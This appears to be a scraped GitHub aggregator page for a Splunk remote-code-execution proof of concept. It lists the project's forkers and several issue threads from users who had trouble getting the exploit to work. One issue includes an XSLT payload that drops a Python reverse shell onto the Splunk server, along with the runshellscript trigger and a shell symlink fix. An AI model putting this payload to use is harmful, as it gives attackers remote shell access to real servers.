splunk-rce-poc's People
Forkers
emdnaia shapemaker 0x0eztexh passwa11 0xjashim 6abc cstcamaro isiaon xxragulxx yizhimanpadewoniu tobey123 xiju2003 etxxlq babywyrm lucianbuilder rakhithjk hesccc kernux jheeree wuha0926 brianwgray edd13mora jack1024z ntkscnzv chriss-0x01splunk-rce-poc's Issues
Reverse shell triggering error - Dash vs Bash
I was testing the exploit script on our non-docker Splunk Enterprise 9.0.4 test environment and had an issue with triggering the uploaded reverse shell. It was interesting because the shell.sh
was uploaded and the contents were correct. The exploit script said it was triggered and shell should be achieved. I could also run the same command on the Splunk VM and connect to nc
. So the uploaded reverse shell was fine. But when the exploit script triggered the reverse shell via |runshellscript "shell.sh" "" "" "" "" "" "" "" "<jsid>"
, I would get an error.
When I tinkered with the uploaded shell and triggered the runshellscript
from Splunk web interface, I noticed a change in the error code. That led me to explore other reverse shell options. One of the simple fixes was to replace the original reverse shell with a python
reverse shell in the exploit script. For example:
<exsl:document href="/opt/splunk/bin/scripts/shell.sh" method="text">
<xsl:text>export RHOST="{ip}";export RPORT={port};python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("sh")'</xsl:text>
</exsl:document>
The python reverse shell works fine. But still I was confused why the original sh -i ...
reverse shell was failing when triggered via the runshellscript
.
We looked over it with my colleague Kert and he figured what our issue was. Splunk's runshellscript
executes the shell.sh
with /bin/sh
. But /bin/sh
in itself is a symlink. In docker versions of Splunk, it points to /bin/bash
and the original exploit code works like a charm. In our environment /bin/sh
was pointing to /bin/dash
. Dash could not do the original reverse shell, hence was failing.
So if someone is having a similar issue, replace the original reverse shell of the exploit script with something else like python based (see above). Or, point sh
to bash
instead of dash
with:
ln -s /bin/bash /bin/sh -f
Noticed issue on file upload
Exploit will not work at first.
I uploaded a file manually and got a message text.
Then I changed the exploit code and hardcoded a message text.
Then getting job is fine.
Turning proxy on (that part was sweet)
Fire exploit, see this on file upload stage
idk how to fix it, probably headers are wrong.
Thank you for a great research,
BR
Creating job Failed. Cant seem to get reverse shell back.
So i have tried installing splunk 9.0.1 and also 9.1.1 as stated in previous issue by you and also on your blog. I have tried both ways (Installing it on ubuntu and via docker too). I am getting same error. I am attaching a screenshot below. The upper one is on on prem version and below one was tried on docker as stated bu you in issue 1
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
๐ Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. ๐๐๐
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google โค๏ธ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.